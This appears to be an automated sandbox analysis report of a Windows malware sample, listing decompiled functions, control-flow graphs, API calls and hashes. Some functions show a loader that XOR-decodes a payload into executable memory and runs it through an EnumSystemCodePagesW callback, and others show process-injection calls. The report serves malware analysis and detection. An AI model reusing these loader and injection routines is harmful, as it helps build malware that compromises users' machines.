8050 f24599 LeaveCriticalSection 8047->8050 8049 f28c10 8049->8041 8050->8049 8517 f24985 8518 f24988 8517->8518 8519 f27580 _abort 62 API calls 8518->8519 8520 f24994 8519->8520 8051 f21ec9 8052 f21ed1 8051->8052 8053 f24869 __calloc_crt 58 API calls 8052->8053 8054 f21eeb 8053->8054 8055 f24869 __calloc_crt 58 API calls 8054->8055 8056 f21f04 8054->8056 8055->8056

                                          Executed Functions

                                          Function 001603F8 Relevance: 10.7, APIs: 7, Instructions: 201filememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 1603f8-1604e3 GetPEB call 1607a4 * 7 call 160772 CreateFileW 17 1605cd 0->17 18 1604e9-1604f3 0->18 19 1605cf-1605d3 17->19 23 1605c9-1605cb 18->23 24 1604f9-160509 VirtualAlloc 18->24 21 1605d5-1605d7 19->21 22 1605fc-160600 19->22 27 1605dd-1605e2 21->27 28 1605d9 21->28 25 1605e4-1605e9 22->25 26 160602-160607 22->26 34 1605c4-1605c7 23->34 24->23 31 16050f-16051e ReadFile 24->31 29 1605f2-1605f4 25->29 30 1605eb-1605f0 25->30 32 160614-16061a 26->32 33 160609-160611 VirtualFree 26->33 27->22 28->27 36 1605f6-1605f8 29->36 37 1605fa 29->37 30->22 31->23 38 160524-160545 VirtualAlloc 31->38 33->32 34->19 36->22 37->22 39 160547-16055c call 16070b 38->39 40 1605c2 38->40 43 160593-1605a7 call 1607a4 39->43 44 16055e-160567 39->44 40->34 43->19 50 1605a9-1605ab 43->50 46 16056a-160591 call 16070b 44->46 46->43 51 1605b1-1605c0 VirtualFree 50->51 52 1605ad-1605ae CloseHandle 50->52 51->34 52->51
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001604DB
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00160502
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00160519
                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0016053D
                                          • CloseHandle.KERNELBASE(00000000,?), ref: 001605AE
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001605B9
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00160611
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                          • String ID:
                                          • API String ID: 721982790-0
                                          • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                          • Instruction ID: 02df1ffc338fe68e98fd4a71815f73bdd15a4c024a1351c0efb51b207760b69a
                                          • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                          • Instruction Fuzzy Hash: 46618D35E00214ABCF11DBA8CC84BAFBBB5EF98710F248519E946EB290DB749D51CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00161001 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 53 161001-1610af call 1606f7 call 1607a4 * 7 70 1610b2-1610b6 53->70 71 1610ce-1610db 70->71 72 1610b8-1610cc 70->72 73 1610de-1610e2 71->73 72->70 74 1610e4-1610f8 73->74 75 1610fa-161116 73->75 74->73 77 161120-16114a CreateProcessW 75->77 78 161118-16111b 75->78 81 161154-16116d 77->81 82 16114c-16114f 77->82 79 1612c3-1612c4 78->79 84 161177-161191 ReadProcessMemory 81->84 85 16116f-161172 81->85 82->79 86 161193-161196 84->86 87 16119b-1611a4 84->87 85->79 86->79 88 1611a6-1611b5 87->88 89 1611ce-1611ee VirtualAllocEx 87->89 88->89 90 1611b7-1611c4 call 160360 88->90 91 1611f0-1611f3 89->91 92 1611f8-161210 call 160261 89->92 90->89 97 1611c6-1611c9 90->97 91->79 98 161212-161215 92->98 99 16121a-16121e 92->99 97->79 98->79 100 161227-161231 99->100 101 161233-161261 call 160261 100->101 102 161268-161284 call 160261 100->102 105 161266 101->105 108 161286-161289 102->108 109 16128b-1612a9 Wow64SetThreadContext 102->109 105->100 108->79 110 1612b0-1612b3 call 1601b2 109->110 111 1612ab-1612ae 109->111 113 1612b8-1612ba 110->113 111->79 114 1612c1 113->114 115 1612bc-1612bf 113->115 114->79 115->79
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00161145
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: 568e0db77cf279602cee2811cafd0835d1d7b78f7f3828ca7258fa144f630f1e
                                          • Instruction ID: df8d9944b7fdc9480021e1249a190c63b490a0713ffd88b4680685b467bbff9b
                                          • Opcode Fuzzy Hash: 568e0db77cf279602cee2811cafd0835d1d7b78f7f3828ca7258fa144f630f1e
                                          • Instruction Fuzzy Hash: ECA1E070E00209AFDB45DFA4CD91BAEBBB5BF48304F244469E616EB250D771AAA1DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00160809 Relevance: 7.7, APIs: 5, Instructions: 182fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 116 160809-1609b1 call 1606f7 call 1607a4 * 10 CreateFileW 142 1609b5-1609c4 116->142 143 1609b3 116->143 146 1609c6 142->146 147 1609c8-1609de VirtualAlloc 142->147 144 160a1b-160a1c 143->144 146->144 148 1609e2-1609f6 ReadFile 147->148 149 1609e0 147->149 150 1609fa-160a18 CloseHandle call 160a1d call 160cdb ExitProcess 148->150 151 1609f8 148->151 149->144 151->144
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001609A7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: bad82d185a301e20c64f029e77ff8f0add54596996ee23a4283a6c9c8dfde966
                                          • Instruction ID: 6481a5b9075f6cbe9675bb2b94f1178a74b15aa13e0639fc4fe2d842705cd943
                                          • Opcode Fuzzy Hash: bad82d185a301e20c64f029e77ff8f0add54596996ee23a4283a6c9c8dfde966
                                          • Instruction Fuzzy Hash: 05613B35E50348EADF51DBE4ED12BEEB7B5AF88710F20451AE518FA2A0DB701E90DB05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F212BC Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 156 f212bc-f212d5 157 f212f2 156->157 158 f212d7-f212dc 156->158 159 f212f4-f212fa 157->159 158->157 160 f212de-f212e0 158->160 161 f212e2-f212e7 call f21cc3 160->161 162 f212fb-f21300 160->162 170 f212ed call f21e89 161->170 164 f21302-f2130c 162->164 165 f2130e-f21312 162->165 164->165 167 f21332-f21341 164->167 168 f21322-f21324 165->168 169 f21314-f2131f call f21530 165->169 173 f21343-f21346 167->173 174 f21348 167->174 168->161 172 f21326-f21330 168->172 169->168 170->157 172->161 172->167 175 f2134d-f21352 173->175 174->175 178 f2143b-f2143e 175->178 179 f21358-f2135f 175->179 178->159 180 f213a0-f213a2 179->180 181 f21361-f21369 179->181 183 f213a4-f213a6 180->183 184 f2140c-f2140d call f22752 180->184 181->180 182 f2136b 181->182 185 f21371-f21373 182->185 186 f21469 182->186 187 f213ca-f213d5 183->187 188 f213a8-f213b0 183->188 197 f21412-f21416 184->197 192 f21375-f21377 185->192 193 f2137a-f2137f 185->193 194 f2146d-f21476 186->194 190 f213d7 187->190 191 f213d9-f213dc 187->191 195 f213b2-f213be 188->195 196 f213c0-f213c4 188->196 190->191 199 f21443-f21447 191->199 200 f213de-f213ea call f22873 call f22a2a 191->200 192->193 193->199 201 f21385-f2139e call f22897 193->201 194->159 198 f213c6-f213c8 195->198 196->198 197->194 202 f21418-f2141d 197->202 198->191 204 f21459-f21464 call f21cc3 199->204 205 f21449-f21456 call f21530 199->205 217 f213ef-f213f4 200->217 216 f21401-f2140a 201->216 202->199 203 f2141f-f21430 202->203 208 f21433-f21435 203->208 204->170 205->204 208->178 208->179 216->208 218 f213fa-f213fd 217->218 219 f2147b-f2147f 217->219 218->186 220 f213ff 218->220 219->194 220->216
                                          C-Code - Quality: 69%
                                          			E00F212BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00F21530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00F22752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00F21530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00F21CC3())) = 0x22;
												L4:
												E00F21E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00F22873(_t119)); // executed
											_t88 = E00F22A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00F22897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00F21CC3())) = 0x16;
				goto L4;
			}




























                                          0x00f212c6
                                          0x00f212c9
                                          0x00f212cf
                                          0x00f212d2
                                          0x00f212d5
                                          0x00f212f2
                                          0x00000000
                                          0x00f212f2
                                          0x00f212d7
                                          0x00f212dc
                                          0x00000000
                                          0x00000000
                                          0x00f212e0
                                          0x00f212fb
                                          0x00f212fe
                                          0x00f21300
                                          0x00f2130e
                                          0x00f2130e
                                          0x00f21312
                                          0x00f2131a
                                          0x00f2131f
                                          0x00f2131f
                                          0x00f21322
                                          0x00f21324
                                          0x00000000
                                          0x00f21326
                                          0x00f21326
                                          0x00f2132e
                                          0x00f21330
                                          0x00000000
                                          0x00000000
                                          0x00f21332
                                          0x00f21335
                                          0x00f21338
                                          0x00f2133f
                                          0x00f21341
                                          0x00f21348
                                          0x00f21343
                                          0x00f21343
                                          0x00f21343
                                          0x00f2134d
                                          0x00f21350
                                          0x00f21352
                                          0x00f2143b
                                          0x00000000
                                          0x00f21358
                                          0x00f21358
                                          0x00f21358
                                          0x00f2135f
                                          0x00f213a0
                                          0x00f213a0
                                          0x00f213a2
                                          0x00f2140d
                                          0x00f21413
                                          0x00f21416
                                          0x00f2146d
                                          0x00000000
                                          0x00f21473
                                          0x00f21418
                                          0x00f2141b
                                          0x00f2141d
                                          0x00f21443
                                          0x00f21443
                                          0x00f21447
                                          0x00f21451
                                          0x00f21456
                                          0x00f2145e
                                          0x00f212ed
                                          0x00f212ed
                                          0x00000000
                                          0x00f212ed
                                          0x00f2141f
                                          0x00f21422
                                          0x00f21425
                                          0x00f21426
                                          0x00f21429
                                          0x00f21429
                                          0x00f2142a
                                          0x00f2142d
                                          0x00f21430
                                          0x00000000
                                          0x00f21430
                                          0x00f213a4
                                          0x00f213a6
                                          0x00f213ca
                                          0x00f213cf
                                          0x00f213d5
                                          0x00f213d7
                                          0x00f213d7
                                          0x00f213a8
                                          0x00f213aa
                                          0x00f213b0
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c4
                                          0x00f213b2
                                          0x00f213b7
                                          0x00f213b9
                                          0x00f213b9
                                          0x00f213c6
                                          0x00f213c6
                                          0x00f213d9
                                          0x00f213dc
                                          0x00000000
                                          0x00f213de
                                          0x00f213de
                                          0x00f213df
                                          0x00f213e9
                                          0x00f213ea
                                          0x00f213ef
                                          0x00f213f2
                                          0x00f213f4
                                          0x00f2147b
                                          0x00000000
                                          0x00f2147b
                                          0x00f213fa
                                          0x00f213fd
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00000000
                                          0x00f21469
                                          0x00f213ff
                                          0x00f213ff
                                          0x00f21401
                                          0x00f21401
                                          0x00f21404
                                          0x00f21407
                                          0x00000000
                                          0x00f21407
                                          0x00f213dc
                                          0x00f21361
                                          0x00f21364
                                          0x00f21367
                                          0x00f21369
                                          0x00000000
                                          0x00000000
                                          0x00f2136b
                                          0x00000000
                                          0x00000000
                                          0x00f21371
                                          0x00f21373
                                          0x00f21375
                                          0x00f21377
                                          0x00f21377
                                          0x00f2137a
                                          0x00f2137d
                                          0x00f2137f
                                          0x00000000
                                          0x00f21385
                                          0x00f2138c
                                          0x00f21391
                                          0x00f21394
                                          0x00f21397
                                          0x00f2139a
                                          0x00f2139c
                                          0x00000000
                                          0x00f2139c
                                          0x00f21433
                                          0x00f21433
                                          0x00f21433
                                          0x00000000
                                          0x00f21358
                                          0x00f21352
                                          0x00f21324
                                          0x00f21307
                                          0x00f2130a
                                          0x00f2130c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2130c
                                          0x00f212e2
                                          0x00f212e7
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                                          • Instruction ID: 1bcf9de745c09619da9bc4635b07aa96935cbff39a7f37e185754ced7966e0f4
                                          • Opcode Fuzzy Hash: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                                          • Instruction Fuzzy Hash: 6851C631E00325DBDB24DFA9F88066E77A6BF61330F248729F829866D0D7749D50AB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F21000 Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 221 f21000-f21055 call f2114b call f211dd VirtualAlloc call f21481 228 f21057-f21067 call f21530 221->228 229 f21088-f2108e 221->229 232 f2106a-f2107d 228->232 232->232 233 f2107f-f21082 EnumSystemCodePagesW 232->233 233->229
                                          C-Code - Quality: 92%
                                          			E00F21000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t20;
				_Unknown_base(*)()* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t34;

				_push(_t20);
				_t28 = 0; // executed
				_t6 = E00F2114B(_t20, _t26, 0, 0x17d78400); // executed
				 *_t34 = 0xf33000;
				_v8 = _t6;
				_t7 = E00F211DD(_a12, _t27); // executed
				_t8 = VirtualAlloc(0, 0x12ca, 0x3000, 0x40); // executed
				_t21 = _t8;
				E00F21481(_t21, 0x12ca, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E00F21530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x00000001 ^ 0x000000cc) - 0x00000076 ^ 0x000000d6) + 2;
						_t28 = _t28 + 1;
					} while (_t28 < 0x12ca);
					EnumSystemCodePagesW(_t21, 0); // executed
				}
				return 0;
			}















                                          0x00f21004
                                          0x00f2100c
                                          0x00f2100e
                                          0x00f21013
                                          0x00f2101d
                                          0x00f21020
                                          0x00f21036
                                          0x00f21044
                                          0x00f21048
                                          0x00f2104d
                                          0x00f21055
                                          0x00f21062
                                          0x00f2106a
                                          0x00f21077
                                          0x00f2107a
                                          0x00f2107b
                                          0x00f21082
                                          0x00f21082
                                          0x00f2108e

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2100E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                            • Part of subcall function 00F211DD: __wfsopen.LIBCMT ref: 00F211E8
                                          • VirtualAlloc.KERNELBASE(00000000,000012CA,00003000,00000040), ref: 00F21036
                                          • __fread_nolock.LIBCMT ref: 00F21048
                                          • _memset.LIBCMT ref: 00F21062
                                          • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00F21082
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                          • String ID:
                                          • API String ID: 3693343133-0
                                          • Opcode ID: 457cafc6f259f2c9cd2b42b485befe0c1f0c91649ee63d2f51f8a4702b3650f6
                                          • Instruction ID: b85017fdeed459ce3e2837d68eeccf53ea42e267804486f930ddcc8d970817ca
                                          • Opcode Fuzzy Hash: 457cafc6f259f2c9cd2b42b485befe0c1f0c91649ee63d2f51f8a4702b3650f6
                                          • Instruction Fuzzy Hash: D70147729003587BE7206771AC4BFDF3B9CEB61764F100461FA0197182E5B89802A27C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2149C Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 f2149c-f214b0 call f22400 237 f214b2-f214b5 234->237 238 f214e3 234->238 237->238 239 f214b7-f214bc 237->239 240 f214e5-f214ea call f22445 238->240 241 f214eb-f21502 call f21f5e call f212bc 239->241 242 f214be-f214c2 239->242 254 f21507-f2151d call f21525 241->254 244 f214d3-f214de call f21cc3 call f21e89 242->244 245 f214c4-f214d0 call f21530 242->245 244->238 245->244 254->240
                                          C-Code - Quality: 89%
                                          			E00F2149C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0xf32170);
				E00F22400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00F21F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00F212BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00F21525(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00F21530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E00F21CC3())) = 0x16;
						E00F21E89();
						goto L6;
					}
				}
				return E00F22445(_t16);
			}







                                          0x00f2149c
                                          0x00f2149e
                                          0x00f214a3
                                          0x00f214aa
                                          0x00f214b0
                                          0x00f214e3
                                          0x00f214e3
                                          0x00f214b7
                                          0x00f214b7
                                          0x00f214bc
                                          0x00f214ec
                                          0x00f214f2
                                          0x00f21502
                                          0x00f2150a
                                          0x00f2150c
                                          0x00f2150f
                                          0x00f21516
                                          0x00f2151b
                                          0x00f214be
                                          0x00f214c2
                                          0x00f214cb
                                          0x00f214d0
                                          0x00f214d8
                                          0x00f214de
                                          0x00000000
                                          0x00f214de
                                          0x00f214bc
                                          0x00f214ea

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: 73b7314e4f5ddd45c35979ff5c9e79c312f3cd16fa35a07df943c92d2a174f21
                                          • Instruction ID: a4ea232022add98293206a4766ec40df1d40f51e18e540c309fbbf64920bff20
                                          • Opcode Fuzzy Hash: 73b7314e4f5ddd45c35979ff5c9e79c312f3cd16fa35a07df943c92d2a174f21
                                          • Instruction Fuzzy Hash: 88017131C00228ABCF22FFA5BC0699F7A61BFA1320F148115F82856161D7798A21FB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F211DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 327 f211dd-f211f1 call f211f2
                                          C-Code - Quality: 25%
                                          			E00F211DD(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00F211F2(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                                          0x00f211e0
                                          0x00f211e2
                                          0x00f211e5
                                          0x00f211e8
                                          0x00f211f1

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: df102c888022a9d274b7e57d92e75bebc0ebeaa016ec37f2f3530d1948784acb
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: B6B0927244021C77CE012E82EC02A493B1EAB60660F008020FB0C18171E67BE670A6C9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00F243CC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F243CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                          0x00f243d1
                                          0x00f243e1

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00F243D1
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F243DA
                                          Memory Dump Source
